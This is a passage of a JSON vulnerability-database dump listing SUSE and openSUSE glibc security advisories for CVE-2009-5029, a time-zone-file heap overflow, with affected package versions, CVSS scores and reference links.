"glibc-2.11.3-12.21.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i686", "packageFilename": "glibc-2.11.3-12.21.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-2.11.2-3.7.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-obsolete-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "nscd-2.11.2-3.7.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-info-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i686", "packageFilename": "glibc-2.11.2-3.7.1.i686.rpm", "packageName": "glibc", "operator": "lt"}], "description": "Specially crafted time zone files could cause a heap\n overflow in glibc (CVE-2009-5029).\n\n", "edition": 1, "reporter": "Suse", "published": "2012-01-05T19:08:22", "title": "glibc (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "modified": "2012-01-05T19:08:22", "id": "OPENSUSE-SU-2012:0064-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00040.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:32", "references": ["http://download.novell.com/patch/finder/?keywords=aba5a35b05cac6339a45d9264306d85b", "https://bugzilla.novell.com/661460", "https://bugzilla.novell.com/735850"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i686", "packageFilename": "glibc-devel-2.4-31.97.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-dceext-2.4-31.97.1.i586.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-info-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-2.4-31.97.1.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-i18ndata-2.4-31.97.1.s390x.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.4-31.97.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-x86-2.4-31.97.1.ia64.rpm", "packageName": "glibc-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "nscd-2.4-31.97.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-profile-2.4-31.97.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-profile-2.4-31.97.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.4-31.97.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-profile-2.4-31.97.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-profile-2.4-31.97.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-dceext-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-dceext-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "nscd-2.4-31.97.1.ppc.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-info-2.4-31.97.1.ppc.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-html-2.4-31.97.1.ppc.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-profile-2.4-31.97.1.ppc.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-devel-2.4-31.97.1.ppc.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-info-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-i18ndata-2.4-31.97.1.ppc.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "nscd-2.4-31.97.1.s390x.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-2.4-31.97.1.ppc.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-devel-2.4-31.97.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-devel-2.4-31.97.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-locale-2.4-31.97.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-profile-2.4-31.97.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-html-2.4-31.97.1.ppc.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-locale-2.4-31.97.1.s390x.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.4-31.97.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-dceext-x86-2.4-31.97.1.ia64.rpm", "packageName": "glibc-dceext-x86", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-dceext-2.4-31.97.1.ppc.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-devel-2.4-31.97.1.s390x.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i686", "packageFilename": "glibc-2.4-31.97.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-info-2.4-31.97.1.s390x.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "nscd-2.4-31.97.1.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "nscd-2.4-31.97.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i686", "packageFilename": "glibc-2.4-31.97.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-devel-2.4-31.97.1.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-2.4-31.97.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-profile-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-profile-64bit", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-dceext-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-dceext-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-html-2.4-31.97.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-info-2.4-31.97.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-html-2.4-31.97.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-locale-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-locale-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-2.4-31.97.1.s390x.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-profile-2.4-31.97.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "nscd-2.4-31.97.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-profile-2.4-31.97.1.ppc.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-dceext-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-html-2.4-31.97.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-2.4-31.97.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-i18ndata-2.4-31.97.1.ia64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-locale-2.4-31.97.1.ppc.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-2.4-31.97.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-dceext-2.4-31.97.1.ia64.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-html-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-locale-2.4-31.97.1.ia64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-dceext-2.4-31.97.1.s390x.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "nscd-2.4-31.97.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.4-31.97.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i686", "packageFilename": "glibc-devel-2.4-31.97.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-locale-2.4-31.97.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-locale-x86-2.4-31.97.1.ia64.rpm", "packageName": "glibc-locale-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-2.4-31.97.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-devel-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-devel-64bit", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-dceext-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-dceext-64bit", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-html-2.4-31.97.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ppc", "packageFilename": "glibc-profile-64bit-2.4-31.97.1.ppc.rpm", "packageName": "glibc-profile-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "s390x", "packageFilename": "glibc-32bit-2.4-31.97.1.s390x.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-info-2.4-31.97.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.4-31.97.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "ia64", "packageFilename": "glibc-info-2.4-31.97.1.ia64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "arch": "i586", "packageFilename": "glibc-html-2.4-31.97.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "reporter": "Suse", "published": "2012-01-05T12:08:52", "title": "Security update for glibc (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "modified": "2012-01-05T12:08:52", "id": "SUSE-SU-2012:0023-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00030.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:09", "references": ["https://bugzilla.novell.com/735850", "https://bugzilla.novell.com/678195", "http://download.novell.com/patch/finder/?keywords=465d0206a0a64cb1c71ef81d34e113c1"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-profile-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-devel-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": 